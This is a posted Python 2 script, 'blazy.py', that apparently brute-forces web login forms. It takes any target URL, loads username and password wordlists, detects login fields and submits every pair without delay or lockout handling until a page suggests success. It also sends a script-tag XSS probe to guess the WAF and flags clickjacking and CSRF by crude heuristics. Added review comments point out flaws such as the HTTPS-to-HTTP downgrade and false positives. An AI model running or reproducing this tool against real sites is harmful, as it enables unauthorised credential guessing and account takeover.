FlyFar

blazy.py

Nov 23rd, 2023
Python 8.97 KB | Cybersecurity | 0 0
#!/usr/bin/env python2
# Python 2 only: the script uses print statements, raw_input, cookielib and urllib2.
# Modules
# NOTE(review): itertools and findall are imported but not used anywhere in this listing.
import mechanize
import itertools
import cookielib
import sys
from bs4 import BeautifulSoup
from re import search, findall
from urllib import urlopen
from urllib2 import URLError
# Stuff related to Mechanize browser module
br = mechanize.Browser() # One shared browser object, bound to the short name "br"
# Set cookies: a cookie jar is attached so cookies persist across requests made through br
cookies = cookielib.LWPCookieJar()
br.set_cookiejar(cookies)
# Mechanize settings
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False) # robots.txt handling is switched off
br.set_debug_http(False)
br.set_debug_responses(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time = 1)
# Fixed headers attached to every request made through br. The User-agent is a
# static Firefox 3.0.1 / Fedora string, so all mechanize traffic from this script
# carries the same dated browser signature, which is a usable marker in access logs.
# (The plain urlopen() calls elsewhere in the script do not go through br and so do not use these headers.)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('Accept-Encoding','br')]
# Banner: ASCII-art logo printed once at start-up. The \033[...m sequences are
# ANSI colour escapes; the text has no effect on what the script does.
print """\033[1;37m    ____   _                    
  |  _ \ | |              
  | |_) || |  __ _  ____ _   _
  |  _ < | | / _` ||_  /| | | |
  | |_) || || (_| | / / | |_| |
  |____/ |_| \__,_|/___| \__, |
                          __/ |
   Made with \033[91m<3\033[37m By D3V\033[1;37m   |___/
   \033[0m"""
# Ask the operator for the target URL, force a scheme onto it and load the page.
url = raw_input('\033[1;34m[?]\033[0m Enter target URL: ') #takes input from user
# These are substring tests, not prefix tests: an input that contains 'http://'
# anywhere is left exactly as typed.
if 'http://' in url:
    pass
elif 'https://' in url:
    # NOTE(review): an https:// URL is rewritten to plain http://. Every later
    # request built from this url value, including the submitted usernames and
    # passwords, therefore leaves the machine unencrypted unless the server
    # redirects back to HTTPS.
    url = url.replace('https://', 'http://')
else:
    url = 'http://' + url
try:
    br.open(url, timeout=10.0) #Opens the url
except URLError as e:
    # NOTE(review): every branch above leaves 'http://' inside url, so this
    # prepends a second scheme instead of replacing the first one. The retry
    # is also made without the 10 second timeout used above.
    url = 'https://' + url
    br.open(url)
forms = br.forms() #Finds all the forms present in webpage

# Passive heuristics on the response headers and body. Each check is a plain
# substring test, so the "Vulnerability" lines printed here are hints that need
# manual confirmation, not findings.
headers = str(urlopen(url).headers.headers).lower() #Fetches headers of webpage
# NOTE(review): only X-Frame-Options is looked at. A site that restricts framing
# through a Content-Security-Policy frame-ancestors directive instead would still
# be reported as exposed to clickjacking.
if 'x-frame-options:' not in headers:
    print '\033[1;32m[+]\033[0m Heuristic found a Clickjacking Vulnerability'
# Matches the literal text 'cloudflare-nginx' anywhere in the lower-cased headers.
if 'cloudflare-nginx' in headers:
    print '\033[1;31m[-]\033[0m Target is protected by Cloudflare'
data = br.open(url).read() #Reads the response
# NOTE(review): the absence of any hidden input is taken to mean "no CSRF token".
# Tokens carried in headers or cookies and SameSite cookie protection are not
# considered, and any unrelated hidden field suppresses the message.
if 'type="hidden"' not in data:
    print '\033[1;32m[+]\033[0m Heuristic found a CSRF Vulnerability'
 
soup =  BeautifulSoup(data, 'lxml') #Parses the response with Beautiful Soup
i_title = soup.find('title') #finds the title tag
# Baseline page title: brute() compares the title of each post-submit page with it.
# NOTE(review): 'original' is only bound when the page has a <title>; brute()
# reads it without checking, so a page without a title leaves the name undefined.
if i_title != None:
    original = i_title.contents #value of title tag is assigned to 'original'

def WAF_detector(): #WAF detection function
    """Send one deliberately suspicious request and guess the WAF from the status code.

    Reads the module-level ``url``, appends a script-tag query string to it and
    fetches the result with ``urlopen``. Prints a message for the status codes
    406/501, 999, 419 and 403; any other code prints nothing. Returns None.

    The code-to-product mapping is the author's. These status codes are not
    unique to the named products (403 in particular is an ordinary "forbidden"
    answer), so the output is a guess. The request itself is distinctive in
    access logs: the query string is exactly ``?=<script>alert()</script>``.
    """
    noise = "?=<script>alert()</script>" #a payload which is noisy enough to provoke the WAF
    fuzz = url + noise
    res1 = urlopen(fuzz) #Opens the noise injected payload
    if res1.code == 406 or res1.code == 501: #if the http response code is 406/501
        print"\033[1;31m[-]\033[1;m WAF Detected : Mod_Security"
    elif res1.code == 999: #if the http response code is 999
        print"\033[1;31m[-]\033[1;m WAF Detected : WebKnight"
    elif res1.code == 419: #if the http response code is 419
        print"\033[1;31m[-]\033[1;m WAF Detected : F5 BIG IP"
    elif res1.code == 403: #if the http response code is 403
        print "\033[1;31m[-]\033[1;m Unknown WAF Detected"
# Executed at module level, right after the definition and before the wordlists are loaded.
WAF_detector()

def wordlist_u(lst): #Loads usernames from usernames.txt
    """Append every line of ``usernames.txt`` to ``lst``, in file order.

    The file is opened relative to the current working directory. Only the
    "\\n" character is removed from each line, so blank lines become empty
    entries and a "\\r" from CRLF line endings stays in the value.

    ``lst`` is modified in place; nothing is returned. If the file cannot be
    opened (IOError) a message is printed and the script exits through quit().
    """
    try:
        with open('usernames.txt','r') as f:
            for line in f:
                final = str(line.replace("\n",""))
                lst.append(final)
    except IOError:
        print "\033[1;31m[-]\033[1;m Wordlist not found!"
        quit()
def wordlist_p(lst): #Loads passwords from passwords.txt
    """Append every line of ``passwords.txt`` to ``lst``, in file order.

    Same logic as wordlist_u with a different file name: the file is opened
    relative to the current working directory and only "\\n" is removed from
    each line.

    ``lst`` is modified in place; nothing is returned. If the file cannot be
    opened (IOError) a message is printed and the script exits through quit().
    """
    try:
        with open('passwords.txt','r') as f:
            for line in f:
                final = str(line.replace("\n",""))
                lst.append(final)
    except IOError:
        print"\033[1;31m[-]\033[1;m Wordlist not found!"
        quit()
# Module-level candidate lists; brute() reads both as globals.
usernames = []
wordlist_u(usernames)
print '\033[1;97m[>]\033[1;m Usernames loaded: %i'% len(usernames)
passwords = []
wordlist_p(passwords)
# The '+' after '%' is a unary plus on len(passwords); it does not change the value printed.
print '\033[1;97m[>]\033[1;m Passwords loaded: %i'% + len(passwords)
def find(): #Function for finding forms
    """Walk the forms of the loaded page and hand the first login-like one to brute().

    Works on the module-level ``forms`` iterable. Each form is converted to its
    string representation and searched with regular expressions for a text
    control and a password control whose value is empty. The first such text
    control is assumed to be the username field. A select control, if present,
    is reported and the operator is asked which option to submit.

    ``form_number`` counts the forms skipped so far, so it is the index of the
    current form when brute() is called. brute() ends in quit() on every path
    that returns normally, so the final 'No forms found' line is only reached
    when no form qualified or when brute() raised an exception that was caught
    here. Returns None.
    """
    form_number = 0
    for f in forms: #Finds all the forms in the webpage
        data = str(f) #Converts the form object to its string representation
        username = search(r'<TextControl\([^<]*=\)>', data) #Searches for fields that accept plain text

        if username: #if such field is found
            username = (username.group().split('<TextControl(')[1][:-3]) #Extracts the name of field (drops the trailing '=)>')
            print '\033[1;33m[!]\033[0m Username field: ' + username #prints name of field
            passwd = search(r'<PasswordControl\([^<]*=\)>', data) #Searches for fields that accept password like text

            if passwd: #if such field is found
                passwd = (passwd.group().split('<PasswordControl(')[1][:-3]) #Extracts the field name
                print '\033[1;33m[!]\033[0m Password field: ' + passwd #prints name of field
                select_n = search(r'SelectControl\([^<]*=', data) #checks for other selectable menus in form

                if select_n: #if a menu is found
                    name = (select_n.group().split('(')[1][:-1]) #Extracts the menu name
                    select_o = search(r'SelectControl\([^<]*=[^<]*\)>', data) #select_o matches the menu together with its option list

                    if select_o: #Proceeds to find options of menu
                        menu = "True" #Sets the menu to be true (a string flag, not a boolean)
                        options = (select_o.group().split('=')[1][:-1]) #Extracts options
                        print '\n\033[1;33m[!]\033[0m A drop down menu detected.'
                        print '\033[1;33m[!]\033[0m Menu name: ' + name #prints menu name
                        print '\033[1;33m[!]\033[0m Options available: ' + options #prints available options
                        option = raw_input('\033[1;34m[?]\033[0m Please Select an option:>> ') #Gets option from user
                        brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
                    else:
                        menu = "False" #No menu is present in the form
                        # NOTE(review): 'option' is not assigned on this path unless an
                        # earlier loop iteration set it; the resulting NameError would be
                        # caught below and reported through cannotUseBruteForce.
                        try:
                            brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
                        except Exception as e:
                            cannotUseBruteForce(username, e)
                            pass                           
                else:
                    menu = "False" #No menu is present in the form
                    option = "" #Sets option to an empty string
                    name = "" #Sets name to an empty string
                    try:
                        brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
                    except Exception as e:
                       cannotUseBruteForce(username, e)
                       pass
            else:
                form_number = form_number + 1
                pass
        else:
            form_number = form_number + 1
            pass
    print '\033[1;31m[-]\033[0m No forms found'
def cannotUseBruteForce(username, e):
    """Print a two-line error report after brute() raised inside find().

    ``username`` is the form field name that find() extracted, not an account
    name from the wordlist. ``e`` is the caught exception; its ``message``
    attribute (Python 2 exception API) is printed. Returns None.
    """
    print '\r\033[1;31m[!]\033[0m Cannot use brute force with user %s.' % username
    print '\r    [Error: %s]' % e.message  
def brute(username, passwd, menu, option, name, form_number):
    """Submit every username/password pair from the loaded wordlists to one form.

    Args:
        username: name of the form's text field that receives the user name.
        passwd: name of the form's password field.
        menu: the string "True" or "False"; "True" means a select control is set too.
        option: value chosen for the select control (used only when menu == "True").
        name: name of the select control (used only when menu == "True").
        form_number: index of the form on the page, passed to select_form(nr=...).

    Reads the module-level ``usernames``, ``passwords``, ``url``, ``br`` and
    ``original``. Every path that returns normally ends in quit(), so the
    function never returns to its caller unless an exception is raised.

    What the traffic looks like: each attempt is a fresh load of ``url``
    followed by one form submission, with no delay between attempts and no
    handling of lockout, throttling or CAPTCHA responses.

    How success is decided: a response that does not contain the phrase
    'username or password' counts as a hit when its <title> differs from the
    baseline title, or, if it has no <title>, when it contains 'logout'. Any
    page with a different title (an error, lockout or challenge page) is
    therefore also reported as valid credentials.
    """
    for uname in usernames:
        progress = 1 # per-username attempt counter for the progress line
        print '\033[1;97m[>]\033[1;m Bruteforcing username: %s'% uname
        for password in passwords:
            # '\r' rewrites the same terminal line on every attempt
            sys.stdout.write('\r\033[1;97m[>]\033[1;m Passwords tried: %i / %i'% (progress, len(passwords)))
            sys.stdout.flush()
            br.open(url)  
            br.select_form(nr=form_number)
            br.form[username] = uname
            br.form[passwd] = password
            if menu == "False":
                pass
            elif menu == "True":
                br.form[name] = [option]
            else:
                pass
            resp = br.submit()
            data = resp.read()
            data_low = data.lower()
            # The only failure marker recognised is this English phrase.
            if 'username or password' in data_low:
                pass
            else:
                soup =  BeautifulSoup(data, 'lxml')
                i_title = soup.find('title')
                if i_title == None:
                    data = data.lower()
                    if 'logout' in data:
                        # The working pair is written to stdout in clear text.
                        print '\n\033[1;32m[+]\033[0m Valid credentials found: '
                        print uname
                        print password
                        quit()
                    else:
                        pass
                else:
                    injected = i_title.contents
                    # NOTE(review): 'original' exists only if the first page load had a <title>.
                    if original != injected:
                        # The working pair is written to stdout in clear text.
                        print '\n\033[1;32m[+]\033[0m Valid credentials found: '
                        print '\033[1;32mUsername: \033[0m' + uname
                        print '\033[1;32mPassword: \033[0m' + password
                        quit()
                    else:
                        pass
            progress = progress + 1
        print ''
    print '\033[1;31m[-]\033[0m Failed to crack login credentials'
    quit()
# Entry point of the script: everything above runs at module level, then form discovery starts here.
find()